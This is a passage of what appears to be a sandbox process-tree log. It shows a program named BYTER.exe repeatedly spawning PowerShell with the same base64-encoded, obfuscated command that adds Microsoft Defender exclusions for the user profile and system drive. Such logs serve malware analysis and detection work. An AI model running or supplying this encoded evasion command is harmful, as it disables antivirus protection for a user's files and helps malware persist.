        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        25⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        25⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        26⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        26⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        27⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        27⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        28⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        28⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        29⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        29⤵
        
        PID:1296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        30⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        30⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        31⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        31⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        32⤵
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        32⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        33⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        33⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        34⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        34⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        35⤵
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        35⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        36⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        36⤵
        
        PID:908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        37⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        37⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        38⤵
        
        PID:232
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        38⤵
        
        PID:4656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        39⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        39⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        40⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        40⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        41⤵
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        41⤵
        
        PID:3100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        42⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        42⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        43⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        43⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        44⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        44⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        45⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        45⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        46⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        46⤵
        
        PID:5824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        47⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        47⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        48⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        48⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        49⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        49⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        50⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        50⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        51⤵
        
        PID:380
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        51⤵
        
        PID:5616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        52⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        52⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        53⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        53⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        54⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        54⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        55⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        55⤵
        
        PID:788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        56⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        56⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        57⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        57⤵
        
        PID:5824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
